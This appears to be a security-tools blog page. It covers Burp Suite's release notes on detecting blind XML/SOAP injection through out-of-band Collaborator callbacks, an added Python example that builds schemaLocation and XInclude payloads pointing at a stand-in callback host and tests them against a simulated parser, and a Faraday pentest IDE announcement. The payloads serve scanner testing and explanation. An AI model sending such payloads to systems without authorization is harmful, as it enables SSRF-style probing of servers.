  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.6.26
This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.
Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:
]]>>
and analyzing responses for any resulting error messages.
Burp now sends payloads like:
<nzf xmlns="http://a.b/"
     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
     xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">nzf</nzf>
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.
The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.
In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)
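To make the Collaborator technique concrete, here is an added Python example (illustrative code, not Burp's). It builds the two payload shapes the release note describes, an xsi:schemaLocation payload and an XInclude payload, with a random token in both the element name and the callback hostname, then runs them through a simulated server-side parser that expands XInclude. The callback domain oob.example, the CallbackLog class and the two handler functions are stand-ins assumed for illustration: nothing is fetched over the network, the simulated server only records the URL it would have requested, which is the out-of-band signal that Burp correlates with an issue.

```python
"""Added example: blind XML injection detected through out-of-band callbacks.

Illustrative code, not Burp's. It shows (1) the payload shapes from the
release note above, with a per-injection token in both the element name and
the callback hostname, (2) a simulated vulnerable endpoint whose XML parser
expands XInclude, so the only evidence of the bug is a request that reaches
the callback host, and (3) correlating such hits back to the token.
"""
import secrets
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.etree import ElementInclude

CALLBACK_DOMAIN = "oob.example"   # assumed stand-in for a Collaborator domain


def make_payloads(callback_domain, token=None):
    """Return (token, {technique: payload}). The token ties any later DNS/HTTP
    interaction back to the parameter that carried this payload."""
    # leading letter: XML element names may not start with a digit
    token = token or "x" + secrets.token_hex(5)
    host = f"{token}.{callback_domain}"
    schema_location = (
        f'<{token} xmlns="http://a.b/" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        f'xsi:schemaLocation="http://a.b/ http://{host}/{token}.xsd">{token}</{token}>'
    )
    xinclude = (
        f'<{token} xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include href="http://{host}/{token}.txt" parse="text"/></{token}>'
    )
    return token, {"schema_location": schema_location, "xinclude": xinclude}


class CallbackLog:
    """Plays the Collaborator server: records every URL the parser tries to reach."""

    def __init__(self):
        self.hits = []

    def loader(self, href, parse, encoding=None):
        # A real resolver would fetch href; here the interaction is only recorded.
        self.hits.append(href)
        return "" if parse == "text" else ET.Element("stub")


def vulnerable_handler(xml_text, log):
    """Simulated endpoint: parses client XML and expands XInclude through a
    resolver that can reach the network. The HTTP response reveals nothing."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root, loader=log.loader)
    return "OK"


def hardened_handler(xml_text, log):
    """Same parse, but XInclude is never expanded and no resolver is attached."""
    ET.fromstring(xml_text)
    return "OK"


def correlate(hits, token, callback_domain):
    """Keep only interactions whose hostname carries this injection's token."""
    return [h for h in hits if urlsplit(h).hostname == f"{token}.{callback_domain}"]


if __name__ == "__main__":
    token, payloads = make_payloads(CALLBACK_DOMAIN)
    for name, handler in (("vulnerable", vulnerable_handler),
                          ("hardened", hardened_handler)):
        log = CallbackLog()
        handler(payloads["xinclude"], log)
        print(name, "->", correlate(log.hits, token, CALLBACK_DOMAIN) or "no interaction")
```

The simulated parser only expands XInclude, so only that payload produces an interaction here; the schemaLocation variant is built for completeness and is the one that fires against parsers which perform schema validation, which is why the scan check sends both. Note that the response is "OK" in both the vulnerable and the hardened case: the callback hostname, not the response body, is the evidence.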


Integrated Penetration-Test Environment: Faraday

Monday, September 28, 2015 Sensei Fedon 0 Comments


Integrated Penetration-Test Environment

Faraday v1.0.12 – Pen Test Environment (IPE) Released
Faraday introduces a new concept, the Integrated Penetration-Test Environment (IPE): a multiuser penetration-test IDE designed for the distribution, indexing and analysis of the data generated during a security audit.
The main purpose of Faraday is to re-use the tools already available in the community and take advantage of them in a multiuser way.
It is designed for simplicity: users should feel no difference between their own terminal and the one included in Faraday, which adds a specialised set of functions to help them improve their own work. Do you remember programming without an IDE? Faraday does for a penetration test what an IDE does for programming.
Next Generation Penetration Testing

Requirements

  • Modern Linux (tested on Debian / Ubuntu * / Kali / Backtrack)
  • Python 2.6.x and 2.7.x
  • Qt3
  • CouchDB >= 1.2.0
  • The following python libs:
    • mockito
    • couchdbkit
    • whoosh
    • argparse
    • psycopg2
    • IPy
    • requests


Installation

Download the latest tarball from the project page or, preferably, clone the Git repository and run the installer:
$ git clone https://github.com/infobyte/faraday.git faraday-dev
$ cd faraday-dev
$ ./install


Faraday supports more than 40 tools.
Source && Download: https://github.com/infobyte/faraday
